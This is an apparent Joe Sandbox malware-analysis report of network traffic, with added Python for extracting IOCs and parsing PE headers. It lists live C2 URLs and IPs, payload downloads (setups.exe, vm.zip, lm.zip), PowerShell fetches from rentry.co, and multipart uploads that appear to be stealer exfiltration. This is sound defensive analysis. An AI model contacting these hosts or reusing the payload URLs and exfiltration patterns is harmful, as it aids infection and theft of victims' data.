Source: Malware configuration extractor URLs: http://mzxn.ru/tmp/index.php
Source: Malware configuration extractor URLs: http://100xmargin.com/tmp/index.php
Source: Malware configuration extractor URLs: http://wgdnb4rc.xyz/tmp/index.php
Source: Malware configuration extractor URLs: http://olinsw.ws/tmp/index.php
Source: unknown DNS query: name: rentry.co
Source: unknown Network traffic detected: IP country count 10
Source: global traffic TCP traffic: 192.168.2.4:62293 -> 193.222.96.24:4449
Source: global traffic TCP traffic: 192.168.2.4:62319 -> 94.156.79.190:4449
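The records in this section (explorer.exe connections, the extracted C2 URLs, the rentry.co lookup, raw TCP to port 4449 and the HTTP request and response records that follow) can be parsed and bucketed by family straight from the report text. The Python below is an added example written for this page, not Joe Sandbox code. Its family rules are assumptions read off the traffic shapes visible here (LummaC: POST /api to a .shop host with the Chrome/119 user agent, a form-urlencoded check-in followed by multipart uploads; SmokeLoader: configured C2 paths ending in /tmp/index.php; AsyncRAT/VenomRAT: raw TCP to 4449; PowerShell stagers: the WindowsPowerShell/5.1 user agent fetching from rentry.co and gofile.io; a text/plain POST to a bare-IP host, which the report does not attribute and the code therefore labels neutrally), not a vendor signature set. The sample lines are constructed copies of records from this section.

```python
import ipaddress
import re
from collections import Counter

# Joe Sandbox runs HTTP headers together with no separator; splitting right
# before "<Name>: " for the header names seen in this report recovers them.
HEADER_SPLIT = re.compile(
    r"(?=(?:Host|User-Agent|Connection|Content-Type|Content-Length|Accept-Ranges"
    r"|Date|Server|Last-Modified|ETag|Keep-Alive|Data Raw): )")
RE_CONNECT = re.compile(r"Network Connect: (\S+) (\d+)")
RE_TCP = re.compile(r"TCP traffic: (\S+):(\d+) -> (\S+):(\d+)")
RE_DNS = re.compile(r"DNS query: name: (\S+)")
RE_CFG = re.compile(r"Malware configuration extractor URLs: (\S+)")
RE_HTTP = re.compile(r"HTTP traffic detected: (.*)$")

# Constructed sample: records copied in the report's own line format
# (the response record is cut after the first eight bytes of the dump).
SAMPLE_LINES = [
    "Source: C:\\Windows\\explorer.exe Network Connect: 77.221.157.163 80",
    "Source: Malware configuration extractor URLs: callosallsaospz.shop",
    "Source: Malware configuration extractor URLs: http://mzxn.ru/tmp/index.php",
    "Source: unknown DNS query: name: rentry.co",
    "Source: global traffic TCP traffic: 192.168.2.4:62293 -> 193.222.96.24:4449",
    "Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 05:43:56 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: \"f1600-61ddb109e6b16\"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00",
    "Source: global traffic HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com",
    "Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122",
    "Source: global traffic HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive",
    "Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop",
    "Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: callosallsaospz.shop",
]

def _is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def parse_http(text):
    """Split a run-together request or response record into its parts."""
    parts = HEADER_SPLIT.split(text)
    headers = {k: v.strip() for k, v in (p.partition(": ")[::2] for p in parts[1:])}
    first = parts[0].split()
    if first[0].startswith("HTTP/"):
        return {"kind": "http_response", "status": int(first[1]), "headers": headers}
    return {"kind": "http", "method": first[0], "path": first[1], "headers": headers}

def parse_line(line):
    """Turn one 'Source: ...' record into an event dict, or None."""
    if m := RE_CONNECT.search(line):
        return {"kind": "connect", "host": m[1], "port": int(m[2])}
    if m := RE_TCP.search(line):
        return {"kind": "tcp", "host": m[3], "port": int(m[4])}
    if m := RE_DNS.search(line):
        return {"kind": "dns", "host": m[1]}
    if m := RE_CFG.search(line):
        host = re.sub(r"^https?://", "", m[1]).split("/")[0]
        return {"kind": "config_url", "url": m[1], "host": host}
    if m := RE_HTTP.search(line):
        return parse_http(m[1])
    return None

def classify(ev):
    """Label one event. The rules are assumptions read off the traffic shapes
    in this report, not a vendor signature set."""
    kind, h = ev["kind"], ev.get("headers", {})
    ua, host, ctype = h.get("User-Agent", ""), h.get("Host", ""), h.get("Content-Type", "")
    if kind == "tcp" and ev["port"] == 4449:
        return "asyncrat_venomrat_tcp4449"
    if kind == "config_url" and ev["url"].endswith("/tmp/index.php"):
        return "smokeloader_c2_url"
    if kind == "config_url" and ev["url"].endswith(".shop"):
        return "lummac_c2_domain"
    if kind == "http_response" and (ctype == "application/x-msdos-program"
                                    or h.get("Data Raw", "").startswith("4d 5a")):
        return "pe_download_response"
    if kind == "http":
        if ev["method"] == "POST" and ev["path"] == "/api" and host.endswith(".shop") and "Chrome/119.0.0.0" in ua:
            return "lummac_exfil" if ctype.startswith("multipart/form-data") else "lummac_checkin"
        if "WindowsPowerShell/" in ua:
            return "powershell_download"
        if ev["method"] == "POST" and ev["path"] == "/" and _is_ip(host) and ctype == "text/plain":
            return "bare_ip_text_post"
        if ev["method"] == "GET" and ev["path"].lower().endswith((".exe", ".zip")):
            return "payload_fetch"
    return "unclassified"

def build_iocs(lines):
    """Return (IOC sets, label counts) for a list of report lines."""
    iocs = {"domains": set(), "ips": set(), "ports": set(), "urls": set()}
    labels = Counter()
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        labels[classify(ev)] += 1
        host = ev.get("host") or ev.get("headers", {}).get("Host", "")
        if host:
            (iocs["ips"] if _is_ip(host) else iocs["domains"]).add(host)
        if "port" in ev:
            iocs["ports"].add(ev["port"])
        if "url" in ev:
            iocs["urls"].add(ev["url"])
    return iocs, labels
```

`build_iocs(SAMPLE_LINES)` yields one hit per family rule, two unclassified events (the explorer.exe connect and the DNS query, which carry IOCs but no family signal), and the IOC sets ready for blocking: domains callosallsaospz.shop, mzxn.ru, rentry.co and funrecipebooks.com, the three IPs, and ports 80 and 4449. The header splitter only knows the names that occur in this report; a record with an unlisted header would have that header folded into the preceding value.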
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 05:43:56 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 08 00 00 10 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 50 06 00 00 d0 08 00 00 4c 06 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 20 0f 00 00 02 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 50 0f 00 00 02 00 00 00 12 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 60 
0f 00 00 02 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
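The response record above carries the first bytes of a downloaded executable: the MZ header with e_lfanew 0x78, the DOS stub, the PE signature, a COFF header for AMD64 with five sections and TimeDateStamp 0x03415a6c, a PE32+ optional header (entry point 0x5ac0, ImageBase 0x140000000, console subsystem, DllCharacteristics 0x8160) and a section table naming .text, .rdata, .data, .CRT and .reloc. The Python below is an added example written for this page, not Joe Sandbox code: it converts a "Data Raw" hex string to bytes, parses those headers and applies a few header-level triage checks. Because the dump is truncated in the report, the sample it runs on is constructed with struct.pack to mirror the field values visible above, with empty data directories; it is not a byte copy of the dump.

```python
import datetime
import struct

IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC, PE32_PLUS_MAGIC = 0x10B, 0x20B
SCN_EXECUTE, SCN_WRITE = 0x20000000, 0x80000000
DLL_DYNAMIC_BASE, DLL_NX_COMPAT = 0x0040, 0x0100

def hex_dump_to_bytes(text):
    """Convert the report's space-separated 'Data Raw' hex into bytes."""
    return bytes.fromhex("".join(text.split()))

def parse_pe(data):
    """Parse DOS header, COFF header, optional header and section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic, = struct.unpack_from("<H", data, opt)
    if magic not in (PE32_MAGIC, PE32_PLUS_MAGIC):
        raise ValueError(f"unknown optional header magic {magic:#x}")
    plus = magic == PE32_PLUS_MAGIC
    entry, = struct.unpack_from("<I", data, opt + 16)
    # ImageBase is a QWORD at +24 in PE32+, a DWORD at +28 in PE32.
    image_base, = struct.unpack_from("<Q" if plus else "<I", data, opt + (24 if plus else 28))
    subsystem, dllchar = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": f[1], "va": f[2], "rawsize": f[3], "characteristics": f[9]})
    return {"machine": machine, "timestamp": stamp, "pe32plus": plus, "entry_point": entry,
            "image_base": image_base, "subsystem": subsystem, "dll_characteristics": dllchar,
            "sections": sections}

def triage(info):
    """Header-level red flags worth noting before deeper analysis."""
    findings = []
    utc = datetime.timezone.utc
    ts = datetime.datetime.fromtimestamp(info["timestamp"], tz=utc)
    if ts.year < 2000 or ts > datetime.datetime.now(tz=utc):
        findings.append(f"implausible link timestamp {ts:%Y-%m-%d} ({info['timestamp']:#010x})")
    if not info["dll_characteristics"] & DLL_DYNAMIC_BASE:
        findings.append("ASLR (DYNAMIC_BASE) not set")
    if not info["dll_characteristics"] & DLL_NX_COMPAT:
        findings.append("DEP (NX_COMPAT) not set")
    in_code = False
    for s in info["sections"]:
        c = s["characteristics"]
        if c & SCN_EXECUTE and c & SCN_WRITE:
            findings.append(f"section {s['name']} is writable and executable")
        if s["rawsize"] == 0 and s["vsize"] > 0:
            findings.append(f"section {s['name']} has no raw data (filled at runtime?)")
        if c & SCN_EXECUTE and s["va"] <= info["entry_point"] < s["va"] + s["vsize"]:
            in_code = True
    if not in_code:
        findings.append(f"entry point {info['entry_point']:#x} is outside every executable section")
    return findings

def build_sample_pe():
    """Constructed header mirroring the values visible in the report's dump
    (AMD64, five sections, ImageBase 0x140000000, entry 0x5ac0, console
    subsystem, DllCharacteristics 0x8160). Data directories are left empty."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x78)  # e_lfanew, as in the dump
    stub = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            b"This program cannot be run in DOS mode.$\0\0")  # 56 bytes, ends at 0x78
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x8664, 5, 0x03415A6C, 0, 0, 0xF0, 0x0022)
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", 0x20B, 0, 0, 0x8C000, 0x65C00, 0,
                      0x5AC0, 0x1000, 0x140000000, 0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0,
                      0xF7000, 0x400, 0, 3, 0x8160, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"\0" * 128  # 16 empty data directories (constructed)
    table = [(b".text", 0x8C000, 0x1000, 0x8C000, 0x400, 0x60000020),
             (b".rdata", 0x65000, 0x8D000, 0x64C00, 0x8C400, 0x40000040),
             (b".data", 0x3000, 0xF2000, 0x200, 0xF1000, 0xC0000040),
             (b".CRT", 0x1000, 0xF5000, 0x200, 0xF1200, 0x40000040),
             (b".reloc", 0x58, 0xF6000, 0x200, 0xF1400, 0x42000040)]
    secs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                    for n, vs, va, rs, rp, ch in table)
    return bytes(dos) + stub + coff + opt + secs
```

On the constructed sample, `triage(parse_pe(build_sample_pe()))` returns a single finding: the link timestamp decodes to September 1971, which no real toolchain emitted and which is a common sign of a stripped or deliberately zeroed build stamp. ASLR and DEP flags are present, no section is writable and executable, and the entry point falls inside .text. To run the parser on the report's own dump, paste the full "Data Raw" text into `hex_dump_to_bytes`; the dump in the report stops a few hundred bytes in, so a copy shorter than the section table will raise a struct error rather than return partial results.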
Source: Joe Sandbox View IP Address: 77.221.157.163
Source: Joe Sandbox View IP Address: 107.173.160.139
Source: Joe Sandbox View IP Address: 107.173.160.137
Source: Joe Sandbox View ASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 9147
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 166871
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1143
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: GET /setups.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: funrecipebooks.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: GET /microgods/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682Host: rentry.coConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1263
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: GET /download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: GET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: store4.gofile.io
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1281Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 566562Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: callosallsaospz.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1268Host: liernessfornicsa.shop
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
